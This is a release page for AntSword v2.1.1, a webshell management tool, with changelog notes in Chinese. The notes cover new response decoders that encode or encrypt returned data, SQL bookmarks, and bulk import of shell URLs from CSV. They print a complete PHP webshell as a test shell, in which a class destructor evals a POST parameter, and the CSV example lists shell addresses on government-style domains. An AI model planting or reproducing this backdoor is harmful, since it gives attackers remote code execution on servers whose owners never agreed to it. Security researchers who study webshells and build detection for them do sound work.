Skip to content

AntSword v2.1.1

Compare
Choose a tag to compare
@Medicean Medicean released this 27 Apr 14:56
· 260 commits to master since this release

核心模块

  • ❗️新增「解码器」(目前仅支持 PHP)

将返回数据包进行编码/加密

  • ❗️新增 PHP base64rot13 解码器

decoder_1.png

decoder_2.png

  • 修复使用 __destruct 类型 shell 时 解码器不生效的 Bug (thx @scanf)

取消 register_shutdown_function 改为显式调用 asoutput

测试 Shell 如下:

<?php
class Test{
  function __destruct(){
    @eval($_POST['ant']);
  }
}
$test = new Test;
?>

Shell 管理

  • 修复搜索数据时正则表达式输入错误导致crash 问题 #157

数据管理

  • ❗️添加SQL语句书签功能, 将常用的 SQL 语句保存成书签

db_bookmark_2.jpg

  • 修复数据库查询结果字段名有逗号时异常

其它

  • 「默认设置」数据管理项中, 增加「全局书签」设置, 设置一些自己常用的 SQL 语句

db_bookmark_1.jpg

插件相关

从 CSV 中 批量导入 Shell

CSV格式:

**备注,分类,密码,类型,Shell地址**
举个例子:
测试1,test,pass,php,http://gov.cn/666.php
测试2,test,pass,php,http://fbi.com/warning.php
测试3,test,666,php,https://www.virzz.com/vk.php

异常处理,体验优化